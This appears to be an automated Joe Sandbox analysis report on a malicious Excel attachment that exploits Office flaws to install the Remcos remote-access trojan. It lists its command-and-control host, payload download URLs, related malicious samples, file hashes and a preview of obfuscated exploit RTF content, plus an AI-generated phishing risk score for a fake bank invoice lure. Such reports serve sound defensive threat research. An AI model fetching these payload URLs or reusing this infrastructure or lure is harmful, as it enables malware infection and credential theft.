60 sembe.duckdns.org 27->60 62 sembe.duckdns.org 194.187.251.115, 14645, 49173 M247GB United Kingdom 27->62 64 geoplugin.net 178.237.33.50, 49174, 80 ATOM86-ASATOM86NL Netherlands 27->64 46 C:\Users\user\AppData\Local\Temp\...\nots.dat, data 27->46 dropped 98 Contains functionality to bypass UAC (CMSTPLUA) 27->98 100 Detected Remcos RAT 27->100 102 Contains functionality to steal Chrome passwords or cookies 27->102 106 4 other signatures 27->106 file17 104 Uses dynamic DNS services 60->104 signatures18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            AWD 490104998518.xls29%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
            AWD 490104998518.xls100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2F215D8E-00CF-4E4E-9C6A-7B89408264B1}.tmp100%AviraEXP/CVE-2017-11882.Gen

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://geoplugin.net/json.gp0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://192.3.176.174/60/WDER.txt0%Avira URL Cloudsafe
            http://192.3.176.174/60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc0%Avira URL Cloudsafe
            http://192.3.176.174/60/creatednewwaterbottleforme.gIFj0%Avira URL Cloudsafe
            http://tny.wtf/sA0%Avira URL Cloudsafe
            http://tny.wtf/sAyX0%Avira URL Cloudsafe
            http://192.3.176.1740%Avira URL Cloudsafe
            http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
            sembe.duckdns.org0%Avira URL Cloudsafe
            http://tny.wtf/0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpQ)0%Avira URL Cloudsafe
            http://go.microsoft.cxj0%Avira URL Cloudsafe
            http://198.46.176.1330%Avira URL Cloudsafe
            http://geoplugin.net/json.gpC)0%Avira URL Cloudsafe
            http://192.3.176.174/60/creatednewwaterbottleforme.gIF0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            sembe.duckdns.org
            		194.187.251.115
            		truetrue
              		unknown
              geoplugin.net
              		178.237.33.50
              		truefalse
                		unknown
                tny.wtf
                		188.114.96.3
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  		unknown
                  sembe.duckdns.orgtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.176.174/60/WDER.txttrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://tny.wtf/sAfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://198.46.176.133/Upload/vbs.jpegfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://192.3.176.174/60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doctrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.176.174/60/creatednewwaterbottleforme.gIFtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://tny.wtf/tny.wtf.url.4.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.176.174powershell.exe, 0000000A.00000002.440512880.0000000008231000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://tny.wtf/sAyX90530000.0.dr, ~DF86012724870D7705.TMP.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpQ)RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.437191072.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://192.3.176.174/60/creatednewwaterbottleforme.gIFjEQNEDT32.EXE, 00000008.00000002.423816080.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://go.microsoft.cxjpowershell.exe, 0000000A.00000002.436709620.00000000005BC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.436996063.00000000022A1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://geoplugin.net/json.gpC)RegAsm.exe, 0000000C.00000002.1053847847.00000000004D5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://198.46.176.133powershell.exe, 0000000A.00000002.436996063.00000000023DB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  192.3.176.174
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUStrue
                  188.114.97.3
                  		unknownEuropean Union
                  		13335CLOUDFLARENETUSfalse
                  188.114.96.3
                  		tny.wtfEuropean Union
                  		13335CLOUDFLARENETUStrue
                  198.46.176.133
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUSfalse
                  178.237.33.50
                  		geoplugin.netNetherlands
                  		8455ATOM86-ASATOM86NLfalse
                  194.187.251.115
                  		sembe.duckdns.orgUnited Kingdom
                  		9009M247GBtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1482975
                  Start date and time:2024-07-26 13:07:28 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 11m 2s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:1
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:AWD 490104998518.xls
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLS@9/31@8/6
                  EGA Information:
                  • Successful, ratio: 66.7%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 73
                  • Number of non-executed functions: 196
                  Cookbook Comments:
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Override analysis time to 56628.1053658464 for current running targets taking high CPU consumption
                  • Override analysis time to 113256.210731693 for current running targets taking high CPU consumption
                  • Override analysis time to 226512.421463386 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3120 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: AWD 490104998518.xls

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:08:52API Interceptor51x Sleep call for process: EQNEDT32.EXE modified
                  07:08:54API Interceptor19x Sleep call for process: powershell.exe modified
                  07:08:54API Interceptor15x Sleep call for process: wscript.exe modified
                  07:08:59API Interceptor13682690x Sleep call for process: RegAsm.exe modified

                  LLM Input / Output

                  InputOutput
                  URL: Office document Model: gpt-4o
                  ```json
{
  "riskscore": 7,
  "reasons": "The document contains a visually prominent email address 'at.guarantees.invoicing(AT)bnpparibas.com' which could mislead the user into contacting a potentially harmful entity. The text creates a sense of urgency by mentioning 'ATTENTION GUARANTEES DEPARTMENT', 'REMINDER 2', and 'PLEASE CREDIT OUR ADVISING FEE EUR 250,00 16/08/23 PLUS COURIER EUR 40,00 PLUS RELAY'. The document impersonates a well-known brand, BNP Paribas, which adds credibility and could deceive the user. The sense of urgency is directly connected to the email address, urging the user to take immediate action."
}

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.97.3RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/
                  #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/4Gs
                  Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                  • downloaddining2.com/h9fmdW6/index.php
                  Quotation.exeGet hashmaliciousFormBookBrowse
                  • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                  LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                  • www.whatareyoucraving.com/drbb/
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/pqv2p
                  PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/vMCQY
                  188.114.96.3waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • hq.ax/Oi8
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/dGa
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • tny.wtf/
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/jjJsPX
                  xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                  • api.keyunet.cn/v3/Project/appInfo/65fc6006
                  LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                  LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                  • cccc.yiuyiu.xyz/config.ini
                  54.xlsGet hashmaliciousFormBookBrowse
                  • tny.wtf/
                  Order_490104.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/vb
                  Order_490104.xlsGet hashmaliciousUnknownBrowse
                  • tny.wtf/vb

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  sembe.duckdns.orgogetback.docGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  S0042328241130.xlsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  M7RrbN4DTk.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 194.187.251.115
                  S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 194.187.251.115
                  0003945 RFQ Cylinder Block PO list and detailed Drawing gpj.exeGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  file.exeGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  PG_320_MPI SRL_20240607_100526.xlsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  crosscheckrosefloweronhairbeauty.gIF.vbsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  swCQS5MMLX.rtfGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  ucancrosstheflowerbeautiytogetin.gIF.vbsGet hashmaliciousRemcosBrowse
                  • 194.187.251.115
                  tny.wtfRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 188.114.96.3
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 188.114.96.3
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 188.114.96.3
                  #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                  • 188.114.97.3
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                  • 188.114.97.3
                  Scan copy.xlsGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  54.xlsGet hashmaliciousFormBookBrowse
                  • 188.114.97.3
                  geoplugin.netwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  Payment Advice__HSBC Banking.pdf.lnkGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  C1ZsNxSer8.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  IAENMAIL-A4-240717-0830-000090912_PDF.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  CDG__ Copia de Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  CFS-0682-2-08 Order.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AS-COLOCROSSINGUSwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 104.168.45.34
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 198.46.178.145
                  file.exeGet hashmaliciousVidarBrowse
                  • 198.46.178.145
                  C1ZsNxSer8.exeGet hashmaliciousRemcosBrowse
                  • 23.95.60.82
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 23.95.60.82
                  #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                  • 198.46.176.133
                  BilseMHALF.rtfGet hashmaliciousUnknownBrowse
                  • 172.245.123.11
                  2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                  • 198.46.174.139
                  DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                  • 107.174.69.116
                  LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                  • 107.175.229.139
                  CLOUDFLARENETUSTNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                  • 104.21.29.136
                  https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                  • 104.16.117.116
                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 188.114.96.3
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 104.21.72.79
                  SecuriteInfo.com.Win32.RATX-gen.11894.20893.exeGet hashmaliciousFormBookBrowse
                  • 172.67.134.182
                  https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=Get hashmaliciousPhisherBrowse
                  • 188.114.96.3
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 188.114.96.3
                  https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxmGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.159.233
                  https://forms.office.com/r/WH4W8hyyNAGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.97.3
                  CLOUDFLARENETUSTNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                  • 104.21.29.136
                  https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                  • 104.16.117.116
                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 188.114.96.3
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 104.21.72.79
                  SecuriteInfo.com.Win32.RATX-gen.11894.20893.exeGet hashmaliciousFormBookBrowse
                  • 172.67.134.182
                  https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=Get hashmaliciousPhisherBrowse
                  • 188.114.96.3
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  • 188.114.96.3
                  https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxmGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.159.233
                  https://forms.office.com/r/WH4W8hyyNAGet hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.97.3
                  AS-COLOCROSSINGUSwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                  • 104.168.45.34
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 198.46.178.145
                  file.exeGet hashmaliciousVidarBrowse
                  • 198.46.178.145
                  C1ZsNxSer8.exeGet hashmaliciousRemcosBrowse
                  • 23.95.60.82
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • 23.95.60.82
                  #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                  • 198.46.176.133
                  BilseMHALF.rtfGet hashmaliciousUnknownBrowse
                  • 172.245.123.11
                  2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                  • 198.46.174.139
                  DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                  • 107.174.69.116
                  LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                  • 107.175.229.139

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):131072
                  Entropy (8bit):0.025596317382011586
                  Encrypted:false
                  SSDEEP:6:I3DPczqNo4avxggLR8zaEWpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPHNktxvYg3J/
                  MD5:4A4581ABB108836C69D536D27E786247
                  SHA1:C867E0260C3DACE84362BAAF6BF34AEA0504E291
                  SHA-256:DB6F7275509A9D8130677A27CD9C5D0B5EDE8A3204A325FBB376E6AEDEB6C90A
                  SHA-512:D6B5CBBC6B6189BBE593B23963F1BAC0B0F5073D7FE8F15A31591C705CCBD89901CDE89692DD6C9DA0516C0D20F712134F812291AFF365A8CD6636BAEE6AF095
                  Malicious:false
                  Reputation:low
                  Preview:......M.eFy...zt..R.h.E......S,...X.F...Fa.q...............................P.F.L..jES.................C..K..........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4760
                  Entropy (8bit):4.834060479684549
                  Encrypted:false
                  SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                  MD5:838C1F472806CF4BA2A9EC49C27C2847
                  SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                  SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                  SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:@...e...........................................................

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Rich Text Format data, version 1
                  Category:dropped
                  Size (bytes):85983
                  Entropy (8bit):2.656661142867628
                  Encrypted:false
                  SSDEEP:384:AMNF0TJENLHnQiT6Bg1VCWsVdTLoTYq4UxggoYYxA7qYpxylSPA:fc1EpHQDgCJwvCvYYxAxylSPA
                  MD5:E03F3290788DE4D7A103F16B780B3CCE
                  SHA1:C220E79A2714ED59F4D7B1D0A4F6C63A03772EA6
                  SHA-256:DB4FED8FB3C35582ADE2FA57A5866EC7795E94BFF34F004F66D15233D1A2FCD8
                  SHA-512:9372B124ECB895A5C7672D75D17EB3EA3D91FAB5ED675AA82090D8D00C15CB4477553342A356C4F8616869C2987105E6468BB2A912196DAB055E06E34AD24B63
                  Malicious:true
                  Yara Hits:
                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc, Author: ditekSHen
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:{\rtf1........{\*\aoutl173498089 \"}.{\443609054`?:`'1=]2=]656[~8|#_@.0.%)5-|8,9,`!`5>@.>^><<`6^.~?~<;_?5.6(2.??888%4/&/>8;^'4!-8.$7^-6'*%038?9:|)/90~>1?!/]?:|54&?(!)^%.^&?2~3|3(|@7$]*^?9:&!+?[.8$,~]$&!92~#76_$+~_8./8^0???!8?@6%@-%'(8^%(;~8?,?41,9(6@%3.[:6#?$&4^?];@~*$?'+?03~?(;[>@`?%-4-?0*8;.?.8$]^.!/2.?9.^^2~];..?5?.6%.?5-/^|%.|%@/.:03,=9%?.@.!=>$2~%8$?.$?55%?>.;.@:3!7:?)?~@?41/<@/&?(2#?*<1,?`]*,1*^1!;6%7+]8..?895?10,%(?|-5`%.4?4+^-03$0]#*%~-5)'!02.@?(4%?.95#.^|?3%[947=2?$_.&`2.??[?)().;<.;??'_!3=?.):5=*.].=_[(-32%.'++|9?5?^_.>!1+!`;5?.<)27??~?1;9)_*0=(%=$89-%$]6![.%=&`0($..!++.%<%_68.|>7/.*|%]1&6<*-.?<9(420^(??@[.3.(%5'_?$5-$>%5<36:=#>)2&/51@$17?,0+(%>8+>%16!4|!(.`34|86.;&?%1.&|^7*?*;[+&;.:[12*%)]4./;6%*=./_!5?+;?@.~$~.[?%@=@.?.>+|>$&~#?383.'$^?<'5].7)~06^~.|.[0?&[:%?^^;,3?%`,:^0>-<6?=&|??]?`-&|/[`780&0|!..%$8!%)4&?_:|'.]#;[[.37&_1].:*)9:*$*%&=+?5`?5]($??#(:?!!3?)?;-6.<|-_.,&??+>-;'|:<?|)24,[,%(8.<?_@>:8?##-;?-6???)>.?4=]%?+/%54&??9?1]>5^&:2]4?'(9#.>6?6`9.;$#2+~..$[]`5$+1?9?(.<&[&87

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):962
                  Entropy (8bit):5.013811273052389
                  Encrypted:false
